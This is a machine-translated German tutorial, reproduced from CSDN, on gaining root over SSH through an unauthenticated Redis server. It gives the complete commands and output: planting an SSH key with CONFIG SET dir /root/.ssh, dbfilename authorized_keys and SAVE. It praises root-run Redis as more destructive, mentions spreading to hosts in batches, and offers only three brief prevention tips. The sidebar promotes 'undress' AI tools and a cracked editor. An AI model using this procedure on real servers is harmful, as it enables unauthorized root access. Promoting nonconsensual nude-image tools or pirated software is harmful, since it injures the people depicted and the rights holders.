suchen
HeimDatenbankRedisLassen Sie uns über die Prinzipien des Redis-Mining sprechen (detaillierte Beispiele)

Dieser Artikel vermittelt Ihnen relevantes Wissen über das Mining-Prinzip von Redis. Hier zeigen wir, wie Sie mit Redis Berechtigungen erweitern, um den Root-Benutzer des Remote-Servers zu erhalten, und wie Sie ihn schützen können alle.

Lassen Sie uns über die Prinzipien des Redis-Mining sprechen (detaillierte Beispiele)

Empfohlenes Lernen: Redis-Video-Tutorial

Heute zeigen wir, wie man den Root-Benutzer des Remote-Servers durch Rechteausweitung über Redis erhält.

1. Zuerst brauchen wir einige Voraussetzungen

  • Bedingung 1: Sie müssen zuerst einen Redis haben und wir müssen seinen Port kennen [Standard 6379];

  • Bedingung 2: Redis-Passwort darf nicht zu komplex sein , oder kein Passwort;

  • Bedingung 3: Der Benutzer, der Redis startet, ist vorzugsweise ein Root-Benutzer, was destruktiver ist; 2.1 Erstellen Sie ein Paar Geheimnisse Der Schlüssel

wird über ssh-keygen generiert. Natürlich können Sie den vorhandenen problemlos verwenden.

root@kali:/usr/local/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
Als nächstes wird der Angriffsschlüsselwert über den öffentlichen Schlüssel generiert
    (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
  • Der Inhalt ist wie folgt

    root@kali:/tmp/rediskey# cat foo.txt
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
    Der Zweck des Hinzufügens von zwei Zeilenumbrüchen davor und danach besteht darin, zu verhindern, dass die Daten miteinander verbunden werden und Fehlerprobleme verursachen.
  • 2.2 Schlüssel für Redis konfigurieren

    Der Vorgang ist wie folgt:

    root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
    OK
    Melden Sie sich bei Redis an, um zu überprüfen, ob er in Redis geschrieben wurde.
      root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
      192.168.243.129:6379> get bar
      "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
    • 2.3 Systemdateien über den Redis-Speichermechanismus ersetzen

    • Sehen wir uns die folgenden Vorgänge an

      192.168.243.129:6379> config set dir /root/.ssh
      OK
      192.168.243.129:6379> config get dir
      1) "dir"
      2) "/root/.ssh"
      192.168.243.129:6379> config set dbfilename "authorized_keys"
      OK
      192.168.243.129:6379> save
      OK
      192.168.243.129:6379> exit
      Zu diesem Zeitpunkt melden wir uns beim Remote-Host an, um den Effekt zu sehen.
        root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
        The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
        ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
        Are you sure you want to continue connecting (yes/no)? yes
        Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
        Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64
        
        Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
        root@kali:~#
      • OK, jetzt haben wir die Rechte erfolgreich eskaliert, also werfen wir einen Blick auf die exportierte Datei? Tatsächlich handelt es sich nur um die gespeicherte Dateiform von Redis. Wenn Sie interessiert sind, können Sie sie selbst öffnen und sehen. Sie wird hier nicht angezeigt.

        3. So verhindern Sie

      • Jetzt haben wir nur eine Host-Berechtigung, um einige Skripte auszuführen und sie dann stapelweise zu infizieren.

        Die Tipps zur Vorbeugung lauten wie folgt:

        Redis sollte nicht auf gefährliche IPs hören.

        Redis muss die Passwortbeschränkungen erhöhen und es darf kein schwaches Passwort sein

        Redis sollte versuchen, es nicht als Root-Benutzer zu verwenden.

          Befolgen Sie die oben genannten drei Punkte, um Redis-Mining zu verhindern, kein Problem
        • Empfohlenes Lernen:

          Redis-Video-Tutorial

        Das obige ist der detaillierte Inhalt vonLassen Sie uns über die Prinzipien des Redis-Mining sprechen (detaillierte Beispiele). Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

        Stellungnahme
        Dieser Artikel ist reproduziert unter:CSDN. Bei Verstößen wenden Sie sich bitte an admin@php.cn löschen
        NoSQL verstehen: Schlüsselmerkmale von RedisNoSQL verstehen: Schlüsselmerkmale von RedisApr 13, 2025 am 12:17 AM

        Zu den wichtigsten Merkmalen von Redis gehören Geschwindigkeit, Flexibilität und Reich Datenstrukturunterstützung. 1) Geschwindigkeit: Redis ist eine In-Memory-Datenbank, und Lese- und Schreibvorgänge sind fast augenblicklich und für Cache und Sitzungsverwaltung geeignet. 2) Flexibilität: Unterstützt mehrere Datenstrukturen wie Zeichenfolgen, Listen, Sammlungen usw., die für die komplexe Datenverarbeitung geeignet sind. 3) Unterstützung bei der Datenstruktur: Bietet Zeichenfolgen, Listen, Sammlungen, Hash -Tabellen usw., die für unterschiedliche Geschäftsanforderungen geeignet sind.

        Redis: Identifizierung seiner primären FunktionRedis: Identifizierung seiner primären FunktionApr 12, 2025 am 12:01 AM

        Die Kernfunktion von Redis ist ein Hochleistungs-In-Memory-Datenspeicher- und Verarbeitungssystem. 1) Hochgeschwindigkeitsdatenzugriff: Redis speichert Daten im Speicher und bietet Lese- und Schreibgeschwindigkeit auf Mikrosekunden. 2) Reiche Datenstruktur: Unterstützt Zeichenfolgen, Listen, Sammlungen usw. und passt an eine Vielzahl von Anwendungsszenarien. 3) Persistenz: Behalten Sie Daten an, um durch RDB und AOF zu diskutieren. 4) Abonnement veröffentlichen: Kann in Nachrichtenwarteschlangen oder Echtzeit-Kommunikationssystemen verwendet werden.

        Redis: Ein Leitfaden für beliebte DatenstrukturenRedis: Ein Leitfaden für beliebte DatenstrukturenApr 11, 2025 am 12:04 AM

        Redis unterstützt eine Vielzahl von Datenstrukturen, darunter: 1. String, geeignet zum Speichern von Einzelwertdaten; 2. Liste, geeignet für Warteschlangen und Stapel; 3.. SET, verwendet zum Speichern nicht duplikatischer Daten; V. 5. Hash -Tabelle, geeignet zum Speichern von Objekten oder strukturierten Daten.

        So implementieren Sie Redis -ZählerSo implementieren Sie Redis -ZählerApr 10, 2025 pm 10:21 PM

        Der Redis-Zähler ist ein Mechanismus, der die Speicherung von Redis-Schlüsselwertpaaren verwendet, um Zählvorgänge zu implementieren, einschließlich der folgenden Schritte: Erstellen von Zählerschlüssel, Erhöhung der Zählungen, Verringerung der Anzahl, Zurücksetzen der Zählungen und Erhalt von Zählungen. Die Vorteile von Redis -Zählern umfassen schnelle Geschwindigkeit, hohe Parallelität, Haltbarkeit und Einfachheit und Benutzerfreundlichkeit. Es kann in Szenarien wie Benutzerzugriffszählungen, Echtzeit-Metrikverfolgung, Spielergebnissen und Ranglisten sowie Auftragsverarbeitungszählung verwendet werden.

        So verwenden Sie die Befehlszeile der RedisSo verwenden Sie die Befehlszeile der RedisApr 10, 2025 pm 10:18 PM

        Verwenden Sie das Redis-Befehlszeilen-Tool (REDIS-CLI), um Redis in folgenden Schritten zu verwalten und zu betreiben: Stellen Sie die Adresse und den Port an, um die Adresse und den Port zu stellen. Senden Sie Befehle mit dem Befehlsnamen und den Parametern an den Server. Verwenden Sie den Befehl Hilfe, um Hilfeinformationen für einen bestimmten Befehl anzuzeigen. Verwenden Sie den Befehl zum Beenden, um das Befehlszeilenwerkzeug zu beenden.

        So erstellen Sie den Redis -ClustermodusSo erstellen Sie den Redis -ClustermodusApr 10, 2025 pm 10:15 PM

        Der Redis -Cluster -Modus bietet Redis -Instanzen durch Sharding, die Skalierbarkeit und Verfügbarkeit verbessert. Die Bauschritte sind wie folgt: Erstellen Sie ungerade Redis -Instanzen mit verschiedenen Ports; Erstellen Sie 3 Sentinel -Instanzen, Monitor -Redis -Instanzen und Failover; Konfigurieren von Sentinel -Konfigurationsdateien, Informationen zur Überwachung von Redis -Instanzinformationen und Failover -Einstellungen hinzufügen. Konfigurieren von Redis -Instanzkonfigurationsdateien, aktivieren Sie den Cluster -Modus und geben Sie den Cluster -Informationsdateipfad an. Erstellen Sie die Datei nodes.conf, die Informationen zu jeder Redis -Instanz enthält. Starten Sie den Cluster, führen Sie den Befehl erstellen aus, um einen Cluster zu erstellen und die Anzahl der Replikate anzugeben. Melden Sie sich im Cluster an, um den Befehl cluster info auszuführen, um den Clusterstatus zu überprüfen. machen

        So lesen Sie Redis -WarteschlangeSo lesen Sie Redis -WarteschlangeApr 10, 2025 pm 10:12 PM

        Um eine Warteschlange aus Redis zu lesen, müssen Sie den Warteschlangenname erhalten, die Elemente mit dem Befehl LPOP lesen und die leere Warteschlange verarbeiten. Die spezifischen Schritte sind wie folgt: Holen Sie sich den Warteschlangenname: Nennen Sie ihn mit dem Präfix von "Warteschlange:" wie "Warteschlangen: My-Queue". Verwenden Sie den Befehl LPOP: Wischen Sie das Element aus dem Kopf der Warteschlange aus und geben Sie seinen Wert zurück, z. B. die LPOP-Warteschlange: my-queue. Verarbeitung leerer Warteschlangen: Wenn die Warteschlange leer ist, gibt LPOP NIL zurück, und Sie können überprüfen, ob die Warteschlange existiert, bevor Sie das Element lesen.

        So verwenden Sie Redis Cluster ZsetSo verwenden Sie Redis Cluster ZsetApr 10, 2025 pm 10:09 PM

        Verwendung von ZSET in Redis -Cluster: ZSET ist eine geordnete Sammlung, die Elemente mit Punktzahlen assoziiert. Sharding -Strategie: a. Hash Sharding: Verteilt den Hash -Wert gemäß dem ZSet -Schlüssel. B. Reichweite Sharding: Unterteilen Sie in Bereiche gemäß den Elementzahlen und weisen Sie jedem Bereich verschiedenen Knoten zu. Operationen lesen und schreiben: a. Operationen lesen: Wenn der Zset -Schlüssel zum Shard des aktuellen Knotens gehört, wird er lokal verarbeitet. Andernfalls wird es an den entsprechenden Shard weitergeleitet. B. Schreibvorgang: Immer in Scherben, die den Zset -Schlüssel halten.

        See all articles

        Heiße KI -Werkzeuge

        Undresser.AI Undress

        Undresser.AI Undress

        KI-gestützte App zum Erstellen realistischer Aktfotos

        AI Clothes Remover

        AI Clothes Remover

        Online-KI-Tool zum Entfernen von Kleidung aus Fotos.

        Undress AI Tool

        Undress AI Tool

        Ausziehbilder kostenlos

        Clothoff.io

        Clothoff.io

        KI-Kleiderentferner

        AI Hentai Generator

        AI Hentai Generator

        Erstellen Sie kostenlos Ai Hentai.

        Heißer Artikel

        R.E.P.O. Energiekristalle erklärten und was sie tun (gelber Kristall)
        3 Wochen vorBy尊渡假赌尊渡假赌尊渡假赌
        R.E.P.O. Beste grafische Einstellungen
        3 Wochen vorBy尊渡假赌尊渡假赌尊渡假赌
        R.E.P.O. So reparieren Sie Audio, wenn Sie niemanden hören können
        3 Wochen vorBy尊渡假赌尊渡假赌尊渡假赌
        WWE 2K25: Wie man alles in Myrise freischaltet
        4 Wochen vorBy尊渡假赌尊渡假赌尊渡假赌

        Heiße Werkzeuge

        MinGW – Minimalistisches GNU für Windows

        MinGW – Minimalistisches GNU für Windows

        Dieses Projekt wird derzeit auf osdn.net/projects/mingw migriert. Sie können uns dort weiterhin folgen. MinGW: Eine native Windows-Portierung der GNU Compiler Collection (GCC), frei verteilbare Importbibliotheken und Header-Dateien zum Erstellen nativer Windows-Anwendungen, einschließlich Erweiterungen der MSVC-Laufzeit zur Unterstützung der C99-Funktionalität. Die gesamte MinGW-Software kann auf 64-Bit-Windows-Plattformen ausgeführt werden.

        DVWA

        DVWA

        Damn Vulnerable Web App (DVWA) ist eine PHP/MySQL-Webanwendung, die sehr anfällig ist. Seine Hauptziele bestehen darin, Sicherheitsexperten dabei zu helfen, ihre Fähigkeiten und Tools in einem rechtlichen Umfeld zu testen, Webentwicklern dabei zu helfen, den Prozess der Sicherung von Webanwendungen besser zu verstehen, und Lehrern/Schülern dabei zu helfen, in einer Unterrichtsumgebung Webanwendungen zu lehren/lernen Sicherheit. Das Ziel von DVWA besteht darin, einige der häufigsten Web-Schwachstellen über eine einfache und unkomplizierte Benutzeroberfläche mit unterschiedlichen Schwierigkeitsgraden zu üben. Bitte beachten Sie, dass diese Software

        EditPlus chinesische Crack-Version

        EditPlus chinesische Crack-Version

        Geringe Größe, Syntaxhervorhebung, unterstützt keine Code-Eingabeaufforderungsfunktion

        SublimeText3 Linux neue Version

        SublimeText3 Linux neue Version

        SublimeText3 Linux neueste Version

        SublimeText3 chinesische Version

        SublimeText3 chinesische Version

        Chinesische Version, sehr einfach zu bedienen